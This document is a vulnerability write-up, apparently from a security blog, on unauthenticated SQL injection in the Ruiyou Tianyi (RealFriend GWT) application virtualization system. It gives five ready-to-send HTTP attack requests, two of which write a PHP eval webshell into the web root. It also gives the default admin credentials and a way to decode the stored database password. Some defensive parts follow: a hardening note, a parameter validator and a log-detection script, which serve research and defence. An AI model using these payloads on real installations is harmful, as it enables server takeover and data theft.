Notes on a remote code execution in an application virtualization system

Vulnerability Profile

The Weibu Online vulnerability team obtained remote code execution vulnerability intelligence (a 0day) for the Ruiyou Tianyi application virtualization system through the "X Vulnerability Reward Program". Attackers can execute arbitrary code through this vulnerability, resulting in the system being compromised and controlled. The Ruiyou Tianyi application virtualization system is an application virtualization platform based on a server-computing architecture: it centrally deploys the user's application software on a Ruiyou Tianyi service cluster, and clients access the authorized applications on the server through the web, enabling centralized applications, remote access, collaborative office work, and so on.

The vulnerability exists because an unauthenticated interface performs no validation of the parameters it receives, which leads to SQL injection; and because the MySQL instance in the bundled environment has permission to write files, a webshell can be written to disk, ultimately resulting in code execution.

Affected version

5.x <= Ruiyou Tianyi application virtualization system (GWT System) <= 7.0.2.

Environment setup

The installation package Gwt7.0.2.1.exe, copied from a senior colleague, was installed in default mode.

Register online for a trial at http://mop.realor.cn/TrialReg.aspx

After successful registration, log in with the default account and password Admin/123.

The default web root path is C:/Program Files (x86)/RealFriend/Rap Server/WebRoot

The default database configuration is stored at C:\Program Files (x86)\RealFriend\Rap Server\data\Config\CasDbCnn.dat

The account and password in it are base64-encoded with = replaced by #; replace # with = and then base64-decode them.


Vulnerability reproduction and analysis

View the version information via http://192.168.222.148/RAPAgent.XGI?CMD=GetRegInfo

To see the complete SQL actually executed by the backend, we can use the getLastSql() method provided by the framework to obtain the last executed SQL statement.

Injection 1: IndexController.class.php dologin

webroot/casweb/Home/Controller/IndexController.class.php:dologin

We can see the SQL statement and the request routing for the function:

http://www.casweb.cn.x/index.php?s=/Index/dologin/name/admin/pwd/c4ca4238a0b923820dcc509a6f75849b

Construct a data packet and print out the corresponding SQL statement.

Because the CAPTCHA is not enabled by default, the request reaches the SQL statement directly.

Because the environment was set up with the integrated MySQL, which runs with DBA privileges, the database can write files to any folder:

show global variables like '%secure%';

secure_file_priv=''   # empty value: writing to any folder is allowed

An empty secure_file_priv places no restriction on SELECT ... INTO OUTFILE; setting it to NULL in the MySQL server configuration disables file import and export entirely and removes the webshell-writing step from this chain.

Use the error message to get the absolute path of the project.

Construct the payload:

POST /index.php?s=/Index/dologin/name HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 221

name=1')+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, '<?php eval($_REQUEST["cmd"]);?>' into outfile 'C:/Program Files (x86)/RealFriend/Rap Server/WebRoot/dologin.php'#


Query the account and password of the administrator user


Injection 2: ConsoleExternalUploadApi.XGI

webroot/ConsoleExternalUploadApi.XGI

Three parameters are read; when all three are non-empty, getfarminfo is called to process them.

webroot/Function.XGI

webroot/Common.XGI

No verification is performed:

POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 46
Content-Type: application/x-www-form-urlencoded

initParams=1&sign=2&key=FarmName'and sleep(5)#

The code was modified to print out the SQL command.

Construct the request to perform the injection and write the file:

POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 170
Content-Type: application/x-www-form-urlencoded

initParams=1&sign=1&key=1'union select '<?php eval($_REQUEST["cmd"]);?>' into outfile 'C:/Program Files (x86)/RealFriend/Rap Server/WebRoot/ConsoleExternalUploadApi.php'#


Injection 3: ConsoleExternalUploadApi.XGI uploadAuthorizeKeyFile

POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 122

initParams=command_uploadAuthorizeKeyFile__user_admin'and+sleep(5)#__pwd_1&key=inner&sign=d3adb9869bd6a377fa452930d920fd10


Injection 4: ConsoleExternalApi.XGI createUser

The remaining vulnerabilities are essentially the same vulnerability: different parameters are passed to different locations. Only one is analyzed in detail here; the others are not covered step by step.

We start the analysis from ConsoleExternalApi.XGI.

The parameters are obtained as follows.

From the following code we can draw these conclusions: when the value of $key is inner, $keyVal is a fixed value, and $sign is md5($initparams . $keyVal); $initparams must contain __, which is used to split the data into individual parameters.

Each piece is then split on _ to get the value of each parameter; that is, when the incoming value is a_1__b_2, the final result is a=1&b=2.

Continuing the analysis:

When the incoming cmd value is createUser, the corresponding branch is entered, and a matching statement can be constructed to achieve injection.

POST /ConsoleExternalApi.XGI?initParams=command_createUser__user_admin__pwd_1&key=inner&sign=bd58378906794858b1f57eb272e5d84f HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 46
Content-Type: application/json

{"account":"1'or sleep(5)#",
"userPwd":"1"}
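To make the initParams handling above concrete, here is an added example (not the product's code) of the a_1__b_2 parsing described earlier, combined with the hardened handling a defender would want: the sign is checked in constant time, and every field is whitelisted before it could reach SQL. The KEY_VAL placeholder, the SAFE_VALUE pattern and the command allowlist are assumptions.

```python
import hashlib
import hmac
import re

# Placeholder for the product's fixed $keyVal (assumption, not the real value).
KEY_VAL = "<fixed-keyVal-placeholder>"
# Whitelist for user/account/pwd fields: a quote, space, '#' or '(' never passes.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9@._\-]{1,64}$")
# Commands named in the write-up (assumed allowlist).
ALLOWED_COMMANDS = {"createUser", "getUserDetailByAccount", "uploadAuthorizeKeyFile"}

def parse_init_params(raw: str) -> dict:
    """Split 'a_1__b_2' into {'a': '1', 'b': '2'}: '__' separates pairs and
    the first '_' of each pair separates the key from its value."""
    params = {}
    for pair in raw.split("__"):
        if "_" not in pair:
            raise ValueError(f"malformed pair: {pair!r}")
        key, value = pair.split("_", 1)
        params[key] = value
    return params

def compute_sign(init_params: str) -> str:
    """sign = md5($initparams . $keyVal), as described in the write-up."""
    return hashlib.md5((init_params + KEY_VAL).encode()).hexdigest()

def validate_request(init_params: str, sign: str) -> dict:
    """Hardened handling: a valid sign only proves knowledge of keyVal and says
    nothing about the content, so each field is whitelisted before it could be
    concatenated into SQL (the query itself should still use a prepared statement)."""
    if not hmac.compare_digest(compute_sign(init_params), sign):
        raise PermissionError("bad sign")
    params = parse_init_params(init_params)
    if params.get("command") not in ALLOWED_COMMANDS:
        raise ValueError("unknown command")
    for name, value in params.items():
        if name != "command" and not SAFE_VALUE.match(value):
            raise ValueError(f"rejected field {name!r}: {value!r}")
    return params

def is_valid_request(init_params: str, sign: str) -> bool:
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        validate_request(init_params, sign)
        return True
    except (PermissionError, ValueError):
        return False
```

With this check in place the time-based payloads shown in this write-up are rejected at the field whitelist, even when the caller presents a correct sign.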


Injection 5: ConsoleExternalApi.XGI getUserDetailByAccount

POST /ConsoleExternalApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 132

initParams=command_getUserDetailByAccount__user_admin__account_1' or sleep(5) and '1&key=inner&sign=e24b8206a168347821a2f10aede99058
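All five injection points above share the same markers in the request (a quote followed by sleep(, union select, into outfile, and a <?php payload aimed at WebRoot), so one detection pass over web logs covers them. This is an added example, not part of the original write-up; the request lines are constructed and the rule names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample requests (not real traffic): "METHOD path[?query] body".
SAMPLE_REQUESTS = [
    "GET /RAPAgent.XGI?CMD=GetRegInfo ",
    "POST /index.php?s=/Index/dologin/name name=1')+union+select+1,2,"
    "'<?php eval($_REQUEST[\"cmd\"]);?>' into outfile "
    "'C:/Program Files (x86)/RealFriend/Rap Server/WebRoot/dologin.php'#",
    "POST /ConsoleExternalUploadApi.XGI initParams=1&sign=2&key=FarmName'and sleep(5)#",
    "POST /ConsoleExternalApi.XGI?initParams=command_createUser__user_admin__pwd_1"
    "&key=inner&sign=x {\"account\":\"1'or sleep(5)#\",\"userPwd\":\"1\"}",
    "POST /ConsoleExternalApi.XGI initParams=command_createUser__user_alice__pwd_1&key=inner&sign=x",
]

# Rule names are assumptions; the patterns follow the payload shapes in the write-up.
RULES = [
    ("sqli-union", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("sqli-outfile", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
    ("sqli-sleep", re.compile(r"\bsleep\s*\(", re.I)),
    ("webshell-php", re.compile(r"<\?php", re.I)),
    ("write-webroot", re.compile(r"WebRoot/[^'\"]*\.php", re.I)),
]

def classify(raw_request: str) -> list:
    """Return the names of all rules matching one request line.
    URL decoding runs first so '+union+select' and '%27' are matched as text."""
    text = unquote_plus(raw_request)
    return [name for name, rx in RULES if rx.search(text)]

def scan(lines) -> list:
    """Return (path, hits) for every request that triggers at least one rule."""
    findings = []
    for line in lines:
        hits = classify(line)
        if hits:
            findings.append((line.split()[1].split("?")[0], hits))
    return findings

if __name__ == "__main__":
    for path, hits in scan(SAMPLE_REQUESTS):
        print(path, hits)
```

These patterns catch the literal shapes used here; inline-comment or double-encoding variants need the same normalisation step extended before matching, and a hit on write-webroot should be paired with a file-integrity check of the WebRoot directory.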


Origin blog.csdn.net/qq_38154820/article/details/130368775